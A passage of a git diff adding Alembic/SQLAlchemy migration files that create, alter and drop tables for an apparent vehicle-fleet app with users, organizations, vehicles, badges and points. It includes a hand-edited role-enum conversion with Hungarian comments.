autoincrement=True, nullable=False), + sa.Column('level_number', sa.INTEGER(), autoincrement=False, nullable=False), + sa.Column('min_points', sa.INTEGER(), autoincrement=False, nullable=False), + sa.Column('rank_name', sa.VARCHAR(), autoincrement=False, nullable=False), + sa.PrimaryKeyConstraint('id', name=op.f('level_configs_pkey')), + sa.UniqueConstraint('level_number', name=op.f('level_configs_level_number_key'), postgresql_include=[], postgresql_nulls_not_distinct=False), + schema='data' + ) + op.create_index(op.f('ix_data_level_configs_id'), 'level_configs', ['id'], unique=False, schema='data') + op.create_table('point_rules', + sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), + sa.Column('action_key', sa.VARCHAR(), autoincrement=False, nullable=False), + sa.Column('points', sa.INTEGER(), autoincrement=False, nullable=False), + sa.Column('description', sa.VARCHAR(), autoincrement=False, nullable=True), + sa.Column('is_active', sa.BOOLEAN(), autoincrement=False, nullable=False), + sa.PrimaryKeyConstraint('id', name=op.f('point_rules_pkey')), + schema='data' + ) + op.create_index(op.f('ix_data_point_rules_id'), 'point_rules', ['id'], unique=False, schema='data') + op.create_index(op.f('ix_data_point_rules_action_key'), 'point_rules', ['action_key'], unique=True, schema='data') + op.create_table('alembic_version', + sa.Column('version_num', sa.VARCHAR(length=32), autoincrement=False, nullable=False), + sa.PrimaryKeyConstraint('version_num', name=op.f('alembic_version_pkc')) + ) + op.create_table('user_stats', + sa.Column('user_id', sa.INTEGER(), autoincrement=False, nullable=False), + sa.Column('total_points', sa.INTEGER(), server_default=sa.text('0'), autoincrement=False, nullable=False), + sa.Column('current_level', sa.INTEGER(), server_default=sa.text('1'), autoincrement=False, nullable=False), + sa.Column('last_updated', postgresql.TIMESTAMP(timezone=True), server_default=sa.text('now()'), autoincrement=False, nullable=False), + sa.ForeignKeyConstraint(['user_id'], ['data.users.id'], name=op.f('user_stats_user_id_fkey')), + sa.PrimaryKeyConstraint('user_id', name=op.f('user_stats_pkey')), + schema='data' + ) + op.create_table('vehicle_ownerships', + sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), + sa.Column('vehicle_id', sa.INTEGER(), autoincrement=False, nullable=False), + sa.Column('user_id', sa.INTEGER(), autoincrement=False, nullable=False), + sa.Column('start_date', sa.DATE(), autoincrement=False, nullable=False), + sa.Column('end_date', sa.DATE(), autoincrement=False, nullable=True), + sa.Column('notes', sa.TEXT(), autoincrement=False, nullable=True), + sa.ForeignKeyConstraint(['user_id'], ['data.users.id'], name=op.f('vehicle_ownerships_user_id_fkey')), + sa.PrimaryKeyConstraint('id', name=op.f('vehicle_ownerships_pkey')), + schema='data' + ) + op.create_index(op.f('ix_data_vehicle_ownerships_id'), 'vehicle_ownerships', ['id'], unique=False, schema='data') + op.create_table('vehicle_options_catalog', + sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), + sa.Column('category', sa.VARCHAR(), autoincrement=False, nullable=True), + sa.Column('name_key', sa.VARCHAR(), autoincrement=False, nullable=True), + sa.PrimaryKeyConstraint('id', name=op.f('vehicle_options_catalog_pkey')), + schema='data' + ) + op.create_table('company_members', + sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), + sa.Column('company_id', sa.INTEGER(), autoincrement=False, nullable=False), + sa.Column('user_id', sa.INTEGER(), autoincrement=False, nullable=False), + sa.Column('role', postgresql.ENUM('OWNER', 'MANAGER', 'DRIVER', name='companyrole'), autoincrement=False, nullable=False), + sa.Column('can_edit_service', sa.BOOLEAN(), autoincrement=False, nullable=True), + sa.Column('can_see_costs', sa.BOOLEAN(), autoincrement=False, nullable=True), + sa.Column('is_active', sa.BOOLEAN(), autoincrement=False, nullable=True), + sa.ForeignKeyConstraint(['company_id'], ['data.companies.id'], name=op.f('company_members_company_id_fkey')), + sa.ForeignKeyConstraint(['user_id'], ['data.users.id'], name=op.f('company_members_user_id_fkey')), + sa.PrimaryKeyConstraint('id', name=op.f('company_members_pkey')), + schema='data' + ) + op.create_index(op.f('ix_data_company_members_id'), 'company_members', ['id'], unique=False, schema='data') + op.create_table('companies', + sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), + sa.Column('name', sa.VARCHAR(), autoincrement=False, nullable=False), + sa.Column('tax_number', sa.VARCHAR(), autoincrement=False, nullable=True), + sa.Column('subscription_tier', sa.VARCHAR(), autoincrement=False, nullable=True), + sa.Column('owner_id', sa.INTEGER(), autoincrement=False, nullable=False), + sa.ForeignKeyConstraint(['owner_id'], ['data.users.id'], name=op.f('companies_owner_id_fkey')), + sa.PrimaryKeyConstraint('id', name=op.f('companies_pkey')), + schema='data' + ) + op.create_index(op.f('ix_data_companies_id'), 'companies', ['id'], unique=False, schema='data') + op.drop_index(op.f('ix_data_vehicles_vin'), table_name='vehicles', schema='data') + op.drop_index(op.f('ix_data_vehicles_license_plate'), table_name='vehicles', schema='data') + op.drop_index(op.f('ix_data_vehicles_id'), table_name='vehicles', schema='data') + op.drop_table('vehicles', schema='data') + op.drop_index(op.f('ix_data_organization_members_id'), table_name='organization_members', schema='data') + op.drop_table('organization_members', schema='data') + op.drop_index(op.f('ix_data_verification_tokens_token'), table_name='verification_tokens', schema='data') + op.drop_index(op.f('ix_data_verification_tokens_id'), table_name='verification_tokens', schema='data') + op.drop_table('verification_tokens', schema='data') + op.drop_index(op.f('ix_data_organizations_tax_number'), table_name='organizations', schema='data') + op.drop_index(op.f('ix_data_organizations_id'), table_name='organizations', schema='data') + op.drop_table('organizations', schema='data') + op.drop_index(op.f('ix_data_legal_acceptances_id'), table_name='legal_acceptances', schema='data') + op.drop_table('legal_acceptances', schema='data') + op.drop_index(op.f('ix_data_legal_documents_id'), table_name='legal_documents', schema='data') + op.drop_table('legal_documents', schema='data') + op.drop_index(op.f('ix_data_email_templates_type'), table_name='email_templates', schema='data') + op.drop_index(op.f('ix_data_email_templates_id'), table_name='email_templates', schema='data') + op.drop_table('email_templates', schema='data') + op.drop_index(op.f('ix_data_email_provider_configs_id'), table_name='email_provider_configs', schema='data') + op.drop_table('email_provider_configs', schema='data') + op.drop_index(op.f('ix_data_email_logs_id'), table_name='email_logs', schema='data') + op.drop_index(op.f('ix_data_email_logs_email'), table_name='email_logs', schema='data') + op.drop_table('email_logs', schema='data') + # ### end Alembic commands ### diff --git a/migrations/versions/13d050e8cf6d_initial_baseline_v2.py b/migrations/versions/13d050e8cf6d_initial_baseline_v2.py new file mode 100755 index 0000000..9aba351 --- /dev/null +++ b/migrations/versions/13d050e8cf6d_initial_baseline_v2.py @@ -0,0 +1,200 @@ +"""Initial baseline v2 + +Revision ID: 13d050e8cf6d +Revises: 13bd03551ebf +Create Date: 2026-01-26 09:53:50.248698 + +""" +from typing import Sequence, Union + +from alembic import op +import sqlalchemy as sa + + +# revision identifiers, used by Alembic. +revision: str = '13d050e8cf6d' +down_revision: Union[str, Sequence[str], None] = '13bd03551ebf' +branch_labels: Union[str, Sequence[str], None] = None +depends_on: Union[str, Sequence[str], None] = None + + +def upgrade() -> None: + """Upgrade schema.""" + # ### commands auto generated by Alembic - please adjust! ### + op.create_table('email_logs', + sa.Column('id', sa.Integer(), nullable=False), + sa.Column('email', sa.String(), nullable=True), + sa.Column('type', sa.String(), nullable=True), + sa.Column('sent_at', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True), + sa.PrimaryKeyConstraint('id'), + schema='data' + ) + op.create_index(op.f('ix_data_email_logs_email'), 'email_logs', ['email'], unique=False, schema='data') + op.create_index(op.f('ix_data_email_logs_id'), 'email_logs', ['id'], unique=False, schema='data') + op.create_table('email_provider_configs', + sa.Column('id', sa.Integer(), nullable=False), + sa.Column('name', sa.String(length=50), nullable=True), + sa.Column('provider_type', sa.String(length=20), nullable=True), + sa.Column('priority', sa.Integer(), nullable=True), + sa.Column('settings', sa.JSON(), nullable=False), + sa.Column('is_active', sa.Boolean(), nullable=True), + sa.Column('fail_count', sa.Integer(), nullable=True), + sa.Column('max_fail_threshold', sa.Integer(), nullable=True), + sa.Column('success_rate', sa.Float(), nullable=True), + sa.PrimaryKeyConstraint('id'), + sa.UniqueConstraint('name'), + schema='data' + ) + op.create_index(op.f('ix_data_email_provider_configs_id'), 'email_provider_configs', ['id'], unique=False, schema='data') + op.create_table('email_templates', + sa.Column('id', sa.Integer(), nullable=False), + sa.Column('type', sa.Enum('REGISTRATION', 'PASSWORD_RESET', 'GDPR_NOTICE', name='emailtype'), nullable=True), + sa.Column('subject', sa.String(length=255), nullable=False), + sa.Column('body_html', sa.Text(), nullable=False), + sa.PrimaryKeyConstraint('id'), + schema='data' + ) + op.create_index(op.f('ix_data_email_templates_id'), 'email_templates', ['id'], unique=False, schema='data') + op.create_index(op.f('ix_data_email_templates_type'), 'email_templates', ['type'], unique=True, schema='data') + op.create_table('legal_documents', + sa.Column('id', sa.Integer(), nullable=False), + sa.Column('title', sa.String(length=255), nullable=True), + sa.Column('content', sa.Text(), nullable=False), + sa.Column('version', sa.String(length=20), nullable=False), + sa.Column('region_code', sa.String(length=5), nullable=True), + sa.Column('language', sa.String(length=5), nullable=True), + sa.Column('is_active', sa.Boolean(), nullable=True), + sa.Column('created_at', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True), + sa.PrimaryKeyConstraint('id'), + schema='data' + ) + op.create_index(op.f('ix_data_legal_documents_id'), 'legal_documents', ['id'], unique=False, schema='data') + op.create_table('users', + sa.Column('id', sa.Integer(), nullable=False), + sa.Column('email', sa.String(), nullable=False), + sa.Column('password_hash', sa.Text(), nullable=False), + sa.Column('first_name', sa.String(), nullable=True), + sa.Column('last_name', sa.String(), nullable=True), + sa.Column('birthday', sa.Date(), nullable=True), + sa.Column('is_email_verified', sa.Boolean(), nullable=True), + sa.Column('is_active', sa.Boolean(), nullable=True), + sa.Column('is_banned', sa.Boolean(), nullable=True), + sa.Column('is_gdpr_deleted', sa.Boolean(), nullable=True), + sa.Column('previous_login_count', sa.Integer(), nullable=True), + sa.Column('created_at', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True), + sa.Column('verified_at', sa.DateTime(timezone=True), nullable=True), + sa.PrimaryKeyConstraint('id'), + schema='data' + ) + op.create_index(op.f('ix_data_users_email'), 'users', ['email'], unique=True, schema='data') + op.create_index(op.f('ix_data_users_id'), 'users', ['id'], unique=False, schema='data') + op.create_table('legal_acceptances', + sa.Column('id', sa.Integer(), nullable=False), + sa.Column('user_id', sa.Integer(), nullable=True), + sa.Column('document_id', sa.Integer(), nullable=True), + sa.Column('accepted_at', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True), + sa.Column('ip_address', sa.String(length=45), nullable=True), + sa.Column('user_agent', sa.Text(), nullable=True), + sa.ForeignKeyConstraint(['document_id'], ['data.legal_documents.id'], ), + sa.ForeignKeyConstraint(['user_id'], ['data.users.id'], ), + sa.PrimaryKeyConstraint('id'), + schema='data' + ) + op.create_index(op.f('ix_data_legal_acceptances_id'), 'legal_acceptances', ['id'], unique=False, schema='data') + op.create_table('organizations', + sa.Column('id', sa.Integer(), nullable=False), + sa.Column('name', sa.String(), nullable=False), + sa.Column('org_type', sa.Enum('PRIVATE', 'COMPANY', name='orgtype'), nullable=True), + sa.Column('tax_number', sa.String(), nullable=True), + sa.Column('founded_at', sa.Date(), nullable=True), + sa.Column('validation_status', sa.Enum('NOT_VALIDATED', 'PENDING', 'VALIDATED', 'REJECTED', name='validationstatus'), nullable=True), + sa.Column('owner_id', sa.Integer(), nullable=True), + sa.Column('ui_theme', sa.String(), nullable=True), + sa.Column('created_at', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True), + sa.ForeignKeyConstraint(['owner_id'], ['data.users.id'], ), + sa.PrimaryKeyConstraint('id'), + schema='data' + ) + op.create_index(op.f('ix_data_organizations_id'), 'organizations', ['id'], unique=False, schema='data') + op.create_index(op.f('ix_data_organizations_tax_number'), 'organizations', ['tax_number'], unique=False, schema='data') + op.create_table('verification_tokens', + sa.Column('id', sa.Integer(), nullable=False), + sa.Column('user_id', sa.Integer(), nullable=True), + sa.Column('token', sa.String(length=255), nullable=True), + sa.Column('token_type', sa.Enum('EMAIL_VERIFY', 'PASSWORD_RESET', name='tokentype'), nullable=True), + sa.Column('expires_at', sa.DateTime(timezone=True), nullable=True), + sa.Column('created_at', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True), + sa.ForeignKeyConstraint(['user_id'], ['data.users.id'], ondelete='CASCADE'), + sa.PrimaryKeyConstraint('id'), + schema='data' + ) + op.create_index(op.f('ix_data_verification_tokens_id'), 'verification_tokens', ['id'], unique=False, schema='data') + op.create_index(op.f('ix_data_verification_tokens_token'), 'verification_tokens', ['token'], unique=True, schema='data') + op.create_table('organization_members', + sa.Column('id', sa.Integer(), nullable=False), + sa.Column('org_id', sa.Integer(), nullable=True), + sa.Column('user_id', sa.Integer(), nullable=True), + sa.Column('role', sa.Enum('OWNER', 'ADMIN', 'FLEET_MANAGER', 'DRIVER', name='userrole'), nullable=True), + sa.Column('is_permanent', sa.Boolean(), nullable=True), + sa.ForeignKeyConstraint(['org_id'], ['data.organizations.id'], ondelete='CASCADE'), + sa.ForeignKeyConstraint(['user_id'], ['data.users.id'], ondelete='CASCADE'), + sa.PrimaryKeyConstraint('id'), + schema='data' + ) + op.create_index(op.f('ix_data_organization_members_id'), 'organization_members', ['id'], unique=False, schema='data') + op.create_table('vehicles', + sa.Column('id', sa.Integer(), nullable=False), + sa.Column('vin', sa.String(), nullable=False), + sa.Column('license_plate', sa.String(), nullable=False), + sa.Column('make', sa.String(), nullable=True), + sa.Column('model', sa.String(), nullable=True), + sa.Column('year', sa.Integer(), nullable=True), + sa.Column('is_deleted', sa.Boolean(), nullable=True), + sa.Column('current_org_id', sa.Integer(), nullable=True), + sa.Column('created_at', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True), + sa.ForeignKeyConstraint(['current_org_id'], ['data.organizations.id'], ), + sa.PrimaryKeyConstraint('id'), + schema='data' + ) + op.create_index(op.f('ix_data_vehicles_id'), 'vehicles', ['id'], unique=False, schema='data') + op.create_index(op.f('ix_data_vehicles_license_plate'), 'vehicles', ['license_plate'], unique=False, schema='data') + op.create_index(op.f('ix_data_vehicles_vin'), 'vehicles', ['vin'], unique=True, schema='data') + op.drop_table('alembic_version') + # ### end Alembic commands ### + + +def downgrade() -> None: + """Downgrade schema.""" + # ### commands auto generated by Alembic - please adjust! ### + op.create_table('alembic_version', + sa.Column('version_num', sa.VARCHAR(length=32), autoincrement=False, nullable=False), + sa.PrimaryKeyConstraint('version_num', name=op.f('alembic_version_pkc')) + ) + op.drop_index(op.f('ix_data_vehicles_vin'), table_name='vehicles', schema='data') + op.drop_index(op.f('ix_data_vehicles_license_plate'), table_name='vehicles', schema='data') + op.drop_index(op.f('ix_data_vehicles_id'), table_name='vehicles', schema='data') + op.drop_table('vehicles', schema='data') + op.drop_index(op.f('ix_data_organization_members_id'), table_name='organization_members', schema='data') + op.drop_table('organization_members', schema='data') + op.drop_index(op.f('ix_data_verification_tokens_token'), table_name='verification_tokens', schema='data') + op.drop_index(op.f('ix_data_verification_tokens_id'), table_name='verification_tokens', schema='data') + op.drop_table('verification_tokens', schema='data') + op.drop_index(op.f('ix_data_organizations_tax_number'), table_name='organizations', schema='data') + op.drop_index(op.f('ix_data_organizations_id'), table_name='organizations', schema='data') + op.drop_table('organizations', schema='data') + op.drop_index(op.f('ix_data_legal_acceptances_id'), table_name='legal_acceptances', schema='data') + op.drop_table('legal_acceptances', schema='data') + op.drop_index(op.f('ix_data_users_id'), table_name='users', schema='data') + op.drop_index(op.f('ix_data_users_email'), table_name='users', schema='data') + op.drop_table('users', schema='data') + op.drop_index(op.f('ix_data_legal_documents_id'), table_name='legal_documents', schema='data') + op.drop_table('legal_documents', schema='data') + op.drop_index(op.f('ix_data_email_templates_type'), table_name='email_templates', schema='data') + op.drop_index(op.f('ix_data_email_templates_id'), table_name='email_templates', schema='data') + op.drop_table('email_templates', schema='data') + op.drop_index(op.f('ix_data_email_provider_configs_id'), table_name='email_provider_configs', schema='data') + op.drop_table('email_provider_configs', schema='data') + op.drop_index(op.f('ix_data_email_logs_id'), table_name='email_logs', schema='data') + op.drop_index(op.f('ix_data_email_logs_email'), table_name='email_logs', schema='data') + op.drop_table('email_logs', schema='data') + # ### end Alembic commands ### diff --git a/migrations/versions/553ef1388276_rebuild_schema_v2.py b/migrations/versions/553ef1388276_rebuild_schema_v2.py new file mode 100755 index 0000000..7455c01 --- /dev/null +++ b/migrations/versions/553ef1388276_rebuild_schema_v2.py @@ -0,0 +1,263 @@ +"""rebuild_schema_v2 + +Revision ID: 553ef1388276 +Revises: c21c2c7e70d4 +Create Date: 2026-01-25 11:32:10.692756 + +""" +from typing import Sequence, Union + +from alembic import op +import sqlalchemy as sa +from sqlalchemy.dialects import postgresql + +# revision identifiers, used by Alembic. +revision: str = '553ef1388276' +down_revision: Union[str, Sequence[str], None] = 'c21c2c7e70d4' +branch_labels: Union[str, Sequence[str], None] = None +depends_on: Union[str, Sequence[str], None] = None + + +def upgrade() -> None: + # ### commands auto generated by Alembic - please adjust! ### + op.create_table('system_settings', + sa.Column('key', sa.String(), nullable=False), + sa.Column('value', sa.JSON(), nullable=False), + sa.Column('description', sa.String(), nullable=True), + sa.PrimaryKeyConstraint('key'), + schema='data' + ) + op.create_index(op.f('ix_data_system_settings_key'), 'system_settings', ['key'], unique=False, schema='data') + op.drop_table('costs', schema='data') + op.drop_table('point_rules', schema='data') + op.drop_table('regional_settings', schema='data') + op.drop_table('level_configs', schema='data') + op.drop_table('vehicle_history', schema='data') + op.alter_column('badges', 'description', + existing_type=sa.TEXT(), + type_=sa.String(length=255), + nullable=False, + schema='data') + op.alter_column('badges', 'icon_url', + existing_type=sa.VARCHAR(length=255), + type_=sa.String(length=500), + existing_nullable=True, + schema='data') + op.create_index(op.f('ix_data_badges_id'), 'badges', ['id'], unique=False, schema='data') + op.create_unique_constraint(None, 'badges', ['name'], schema='data') + op.drop_column('badges', 'created_at', schema='data') + op.drop_column('badges', 'criteria_json', schema='data') + op.alter_column('points_ledger', 'user_id', + existing_type=sa.INTEGER(), + nullable=False, + schema='data') + op.alter_column('points_ledger', 'timestamp', + existing_type=postgresql.TIMESTAMP(timezone=True), + nullable=False, + existing_server_default=sa.text('now()'), + schema='data') + op.create_index(op.f('ix_data_points_ledger_id'), 'points_ledger', ['id'], unique=False, schema='data') + op.create_index(op.f('ix_data_points_ledger_user_id'), 'points_ledger', ['user_id'], unique=False, schema='data') + op.add_column('translations', sa.Column('is_published', sa.Boolean(), nullable=True), schema='data') + op.drop_constraint('translations_key_lang_code_key', 'translations', schema='data', type_='unique') + op.create_index(op.f('ix_data_translations_id'), 'translations', ['id'], unique=False, schema='data') + op.create_index(op.f('ix_data_translations_key'), 'translations', ['key'], unique=False, schema='data') + op.create_index(op.f('ix_data_translations_lang_code'), 'translations', ['lang_code'], unique=False, schema='data') + op.create_unique_constraint('uq_translation_key_lang', 'translations', ['key', 'lang_code'], schema='data') + op.alter_column('user_badges', 'user_id', + existing_type=sa.INTEGER(), + nullable=False, + schema='data') + op.alter_column('user_badges', 'badge_id', + existing_type=sa.INTEGER(), + nullable=False, + schema='data') + op.alter_column('user_badges', 'earned_at', + existing_type=postgresql.TIMESTAMP(timezone=True), + nullable=False, + existing_server_default=sa.text('now()'), + schema='data') + op.drop_constraint('user_badges_user_id_badge_id_key', 'user_badges', schema='data', type_='unique') + op.alter_column('user_stats', 'total_points', + existing_type=sa.INTEGER(), + nullable=False, + existing_server_default=sa.text('0'), + schema='data') + op.alter_column('user_stats', 'current_level', + existing_type=sa.INTEGER(), + nullable=False, + existing_server_default=sa.text('1'), + schema='data') + op.alter_column('user_stats', 'last_updated', + existing_type=postgresql.TIMESTAMP(timezone=True), + nullable=False, + existing_server_default=sa.text('now()'), + schema='data') + + # --- JAVÍTOTT RÉSZ KEZDETE (Role konverzió default kezeléssel) --- + # 1. Meglévő default eldobása + op.execute('ALTER TABLE data.users ALTER COLUMN role DROP DEFAULT') + + # 2. Típusmódosítás + op.alter_column('users', 'role', + existing_type=postgresql.ENUM('SUPERUSER', 'REGIONAL_ADMIN', 'MODERATOR', 'BUSINESS_PARTNER', 'USER', name='user_role', schema='data'), + type_=sa.Enum('SUPERUSER', 'REGIONAL_ADMIN', 'MODERATOR', 'BUSINESS_PARTNER', 'USER', name='userrole'), + nullable=False, + schema='data', + postgresql_using='role::text::userrole') + + # 3. Új default beállítása az új típussal + op.execute("ALTER TABLE data.users ALTER COLUMN role SET DEFAULT 'USER'::userrole") + # --- JAVÍTOTT RÉSZ VÉGE --- + + op.drop_index('idx_users_role', table_name='users', schema='data') + op.create_index(op.f('ix_data_users_region_code'), 'users', ['region_code'], unique=False, schema='data') + op.create_foreign_key(None, 'vehicle_assignments', 'user_vehicles', ['vehicle_id'], ['id'], source_schema='data', referent_schema='data') + op.drop_index('ix_data_vehicle_events_vehicle_id', table_name='vehicle_events', schema='data') + op.create_foreign_key(None, 'vehicle_events', 'user_vehicles', ['vehicle_id'], ['id'], source_schema='data', referent_schema='data') + op.create_foreign_key(None, 'vehicle_ownerships', 'user_vehicles', ['vehicle_id'], ['id'], source_schema='data', referent_schema='data') + # ### end Alembic commands ### + + +def downgrade() -> None: + """Downgrade schema.""" + # ### commands auto generated by Alembic - please adjust! ### + op.drop_constraint(None, 'vehicle_ownerships', schema='data', type_='foreignkey') + op.drop_constraint(None, 'vehicle_events', schema='data', type_='foreignkey') + op.create_index('ix_data_vehicle_events_vehicle_id', 'vehicle_events', ['vehicle_id'], unique=False, schema='data') + op.drop_constraint(None, 'vehicle_assignments', schema='data', type_='foreignkey') + op.drop_index(op.f('ix_data_users_region_code'), table_name='users', schema='data') + op.create_index('idx_users_role', 'users', ['role'], unique=False, schema='data') + op.alter_column('users', 'role', + existing_type=sa.Enum('SUPERUSER', 'REGIONAL_ADMIN', 'MODERATOR', 'BUSINESS_PARTNER', 'USER', name='userrole'), + type_=postgresql.ENUM('SUPERUSER', 'REGIONAL_ADMIN', 'MODERATOR', 'BUSINESS_PARTNER', 'USER', name='user_role', schema='data'), + nullable=True, + existing_server_default=sa.text("'USER'::data.user_role"), + schema='data') + op.alter_column('user_stats', 'last_updated', + existing_type=postgresql.TIMESTAMP(timezone=True), + nullable=True, + existing_server_default=sa.text('now()'), + schema='data') + op.alter_column('user_stats', 'current_level', + existing_type=sa.INTEGER(), + nullable=True, + existing_server_default=sa.text('1'), + schema='data') + op.alter_column('user_stats', 'total_points', + existing_type=sa.INTEGER(), + nullable=True, + existing_server_default=sa.text('0'), + schema='data') + op.create_unique_constraint('user_badges_user_id_badge_id_key', 'user_badges', ['user_id', 'badge_id'], schema='data') + op.alter_column('user_badges', 'earned_at', + existing_type=postgresql.TIMESTAMP(timezone=True), + nullable=True, + existing_server_default=sa.text('now()'), + schema='data') + op.alter_column('user_badges', 'badge_id', + existing_type=sa.INTEGER(), + nullable=True, + schema='data') + op.alter_column('user_badges', 'user_id', + existing_type=sa.INTEGER(), + nullable=True, + schema='data') + op.drop_constraint('uq_translation_key_lang', 'translations', schema='data', type_='unique') + op.drop_index(op.f('ix_data_translations_lang_code'), table_name='translations', schema='data') + op.drop_index(op.f('ix_data_translations_key'), table_name='translations', schema='data') + op.drop_index(op.f('ix_data_translations_id'), table_name='translations', schema='data') + op.create_unique_constraint('translations_key_lang_code_key', 'translations', ['key', 'lang_code'], schema='data') + op.drop_column('translations', 'is_published', schema='data') + op.drop_index(op.f('ix_data_points_ledger_user_id'), table_name='points_ledger', schema='data') + op.drop_index(op.f('ix_data_points_ledger_id'), table_name='points_ledger', schema='data') + op.alter_column('points_ledger', 'timestamp', + existing_type=postgresql.TIMESTAMP(timezone=True), + nullable=True, + existing_server_default=sa.text('now()'), + schema='data') + op.alter_column('points_ledger', 'user_id', + existing_type=sa.INTEGER(), + nullable=True, + schema='data') + op.add_column('badges', sa.Column('criteria_json', postgresql.JSONB(astext_type=sa.Text()), autoincrement=False, nullable=True), schema='data') + op.add_column('badges', sa.Column('created_at', postgresql.TIMESTAMP(timezone=True), server_default=sa.text('now()'), autoincrement=False, nullable=True), schema='data') + op.drop_constraint(None, 'badges', schema='data', type_='unique') + op.drop_index(op.f('ix_data_badges_id'), table_name='badges', schema='data') + op.alter_column('badges', 'icon_url', + existing_type=sa.String(length=500), + type_=sa.VARCHAR(length=255), + existing_nullable=True, + schema='data') + op.alter_column('badges', 'description', + existing_type=sa.String(length=255), + type_=sa.TEXT(), + nullable=True, + schema='data') + op.create_table('vehicle_history', + sa.Column('id', sa.INTEGER(), server_default=sa.text("nextval('data.vehicle_history_id_seq'::regclass)"), autoincrement=True, nullable=False), + sa.Column('vehicle_id', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('user_id', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('role', sa.VARCHAR(length=20), autoincrement=False, nullable=False), + sa.Column('start_date', sa.DATE(), autoincrement=False, nullable=False), + sa.Column('end_date', sa.DATE(), autoincrement=False, nullable=True), + sa.Column('start_mileage', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('end_mileage', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('is_active', sa.BOOLEAN(), sa.Computed('(end_date IS NULL)', persisted=True), autoincrement=False, nullable=True), + sa.ForeignKeyConstraint(['user_id'], ['data.users.id'], name='vehicle_history_user_id_fkey'), + sa.PrimaryKeyConstraint('id', name='vehicle_history_pkey'), + schema='data' + ) + op.create_table('level_configs', + sa.Column('id', sa.INTEGER(), server_default=sa.text("nextval('data.level_configs_id_seq'::regclass)"), autoincrement=True, nullable=False), + sa.Column('level_number', sa.INTEGER(), autoincrement=False, nullable=False), + sa.Column('min_points', sa.INTEGER(), autoincrement=False, nullable=False), + sa.Column('name_translation_key', sa.VARCHAR(length=100), autoincrement=False, nullable=True), + sa.Column('region_code', sa.VARCHAR(length=5), server_default=sa.text("'GLOBAL'::character varying"), autoincrement=False, nullable=True), + sa.PrimaryKeyConstraint('id', name='level_configs_pkey'), + sa.UniqueConstraint('level_number', name='level_configs_level_number_key'), + schema='data' + ) + op.create_table('regional_settings', + sa.Column('id', sa.INTEGER(), server_default=sa.text("nextval('data.regional_settings_id_seq'::regclass)"), autoincrement=True, nullable=False), + sa.Column('region_code', sa.VARCHAR(length=5), autoincrement=False, nullable=False), + sa.Column('setting_key', sa.VARCHAR(length=50), autoincrement=False, nullable=False), + sa.Column('value', postgresql.JSONB(astext_type=sa.Text()), autoincrement=False, nullable=False), + sa.Column('start_date', postgresql.TIMESTAMP(timezone=True), server_default=sa.text('now()'), autoincrement=False, nullable=True), + sa.Column('end_date', postgresql.TIMESTAMP(timezone=True), autoincrement=False, nullable=True), + sa.PrimaryKeyConstraint('id', name='regional_settings_pkey'), + schema='data' + ) + op.create_table('point_rules', + sa.Column('id', sa.INTEGER(), server_default=sa.text("nextval('data.point_rules_id_seq'::regclass)"), autoincrement=True, nullable=False), + sa.Column('rule_key', sa.VARCHAR(length=50), autoincrement=False, nullable=False), + sa.Column('points', sa.INTEGER(), autoincrement=False, nullable=False), + sa.Column('start_date', postgresql.TIMESTAMP(timezone=True), server_default=sa.text('now()'), autoincrement=False, nullable=True), + sa.Column('end_date', postgresql.TIMESTAMP(timezone=True), autoincrement=False, nullable=True), + sa.Column('region_code', sa.VARCHAR(length=5), server_default=sa.text("'GLOBAL'::character varying"), autoincrement=False, nullable=True), + sa.Column('is_active', sa.BOOLEAN(), server_default=sa.text('true'), autoincrement=False, nullable=True), + sa.PrimaryKeyConstraint('id', name='point_rules_pkey'), + schema='data' + ) + op.create_table('alembic_version', + sa.Column('version_num', sa.VARCHAR(length=32), autoincrement=False, nullable=False), + sa.PrimaryKeyConstraint('version_num', name='alembic_version_pkc') + ) + op.create_table('costs', + sa.Column('id', sa.INTEGER(), server_default=sa.text("nextval('data.costs_id_seq'::regclass)"), autoincrement=True, nullable=False), + sa.Column('vehicle_id', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('user_id', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('cost_type', sa.VARCHAR(length=50), autoincrement=False, nullable=False), + sa.Column('amount', sa.NUMERIC(precision=10, scale=2), autoincrement=False, nullable=False), + sa.Column('date', sa.DATE(), autoincrement=False, nullable=False), + sa.Column('mileage_at_cost', sa.INTEGER(), autoincrement=False, nullable=True), + sa.Column('description', sa.TEXT(), autoincrement=False, nullable=True), + sa.Column('document_url', sa.VARCHAR(length=255), autoincrement=False, nullable=True), + sa.Column('created_at', postgresql.TIMESTAMP(), server_default=sa.text('now()'), autoincrement=False, nullable=True), + sa.ForeignKeyConstraint(['user_id'], ['data.users.id'], name='costs_user_id_fkey'), + sa.PrimaryKeyConstraint('id', name='costs_pkey'), + schema='data' + ) + op.drop_index(op.f('ix_data_system_settings_key'), table_name='system_settings', schema='data') + op.drop_table('system_settings', schema='data') + # ### end Alembic commands ### diff --git a/migrations/versions/5aed26900f0b_add_persons_and_owner_person_id.py b/migrations/versions/5aed26900f0b_add_persons_and_owner_person_id.py new file mode 100755 index 0000000..694df0e --- /dev/null +++ b/migrations/versions/5aed26900f0b_add_persons_and_owner_person_id.py @@ -0,0 +1,28 @@ +"""add persons and owner_person_id + +Revision ID: 5aed26900f0b +Revises: 10b73fee8967 +Create Date: 2026-02-01 22:22:21.486469 + +""" +from typing import Sequence, Union + +from alembic import op +import sqlalchemy as sa + + +# revision identifiers, used by Alembic. +revision: str = '5aed26900f0b' +down_revision: Union[str, Sequence[str], None] = '10b73fee8967' +branch_labels: Union[str, Sequence[str], None] = None +depends_on: Union[str, Sequence[str], None] = None + + +def upgrade() -> None: + """Upgrade schema.""" + pass + + +def downgrade() -> None: + """Downgrade schema.""" + pass 